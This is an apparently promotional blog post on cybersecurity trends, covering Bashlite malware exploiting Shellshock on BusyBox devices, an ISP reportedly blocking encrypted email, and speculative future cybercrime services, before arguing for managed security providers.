Enterprise IT is a constantly changing market at the moment. IT teams are migrating whole infrastructures to the cloud, constructing colocation data centers and implementing bring-your-own-device strategies. The problem with these technological innovations is that IT professionals need a completely new array of skills. This is even more apparent in terms of cybersecurity. Because of the ever-changing IT environments, it should come as no surprise that data protection, data center security and email encryption are now offered as services that adapt to the variable landscape of cybercrime.
To begin, examine the recent trends in the cybersecurity industry. Take the Shellshock vulnerability, for example. This one exploit has been modified in many ways. Last week, one variation specifically targeted SMTP servers, and this week, cybersecurity researchers identified a new version of the Bashlite malware that utilizes the ShellShock vulnerability to give cybercriminals access and control over any device using BusyBox, Dark Reading reported.
As a side note, BusyBox is software that provides IT teams with stripped-down Unix tools in an executable file. The creators call it "the Swiss Army Knife of Embedded Linux" because it offers so many different functions for customizing embedded systems. Developed on the Linux kernel and used on a variety of devices such as routers, BusyBox can influence a wide range of corporate systems if hacked.
In its current form, Bashlite targets BusyBox, making this malware quite dangerous. According to Dark Reading, Bashlite scans networks for machines using the software, and the malicious code attempts to log into BusyBox. At that point, it incites a download and run command on bin.sh and bin2.sh scripts, which allows the cybercriminal to arrest control.
Preventing email encryption
While Bashlite and similar forms of malware circumvent security by exploiting corporate systems through vulnerabilities, it was recently discovered that Internet service providers might be sabotaging email encryption. Ars Technica reported that Cricket, an AT&T subsidiary, prevented encrypted emails from being sent. However, without visibility into the problem, the individuals sending the messages would have never discovered that information was not being sent securely. This is intriguing because the ISP, or any ISP for that matter, would not stand to benefit from preventing encrypted emails for reaching their destination under protective measures. Could this be a new form of attack, and could someone be hijacking the ISP's network? It is hard to say until an investigation is conducted.
What else is out there?
The Bashlite malware and email decrypting indicate the beginning of a new era of cyber security. Another Dark Reading article reported on three possible, future forms of cyber terrorism:
Botnet armies: With the appropriate amount of funding and teams of cybercriminals, it is possible for these hackers to compromise a large majority of computers. Once machines are under the control of a cybercriminal, they could be used to infect and infiltrate other personal computers, creating a network of machines designed to steal information.
Uber-esque cybercrime: It is common nowadays for services to connect customers with individuals who can provide help, whether that be a ride - think Uber - or help moving, like Craigslist. If someone started a cybercrime service, essentially everyone could become a cybercriminal, hiring hackers to take down networks or access corporate information.
Cybercrime-as-a-service: This scenario would allow anyone to access common tools utilized by cybercriminals. Individuals could visit a website where they select their attacks and are provided with the information necessary to launch data breach attempts. Dark Reading compared this idea to the way that people use GPS devices as a means of guiding them to their destination.
While these cybercrime services do not exist yet, the changing landscape of security could result in some solutions similar to this.
So how does an organization protect itself?
Well, many businesses have already started on the path to protection. CRN cited an IBM study that found security budgets will increase over the next three to five years. Kris Lovejoy, general manager of IBM's security services division, told the source that the boost in spending can be attributed to organizations looking for security service providers because technology paradigms are changing so quickly. This requires partnering with companies that are not only skilled at data protection, but also at creating strong security strategies and implementing practices.
"None of us has the ability to do everything," Lovejoy explained to CRN. "The [managed security services providers] often have skill sets in an application environment or a particular concept that feeds the architecture."
Organizations already acknowledge risks when moving infrastructure to the public cloud, so why should they not consider security for every aspect of their businesses, from email encryption to data centers? Cybercriminals are going to be the first ones to find flaws in innovative IT environments, but that should not scare companies away from using new technologies. Security service providers will ensure the safety of corporate data by adapting security practices to specific environments and the ever-changing landscape of cybercrime.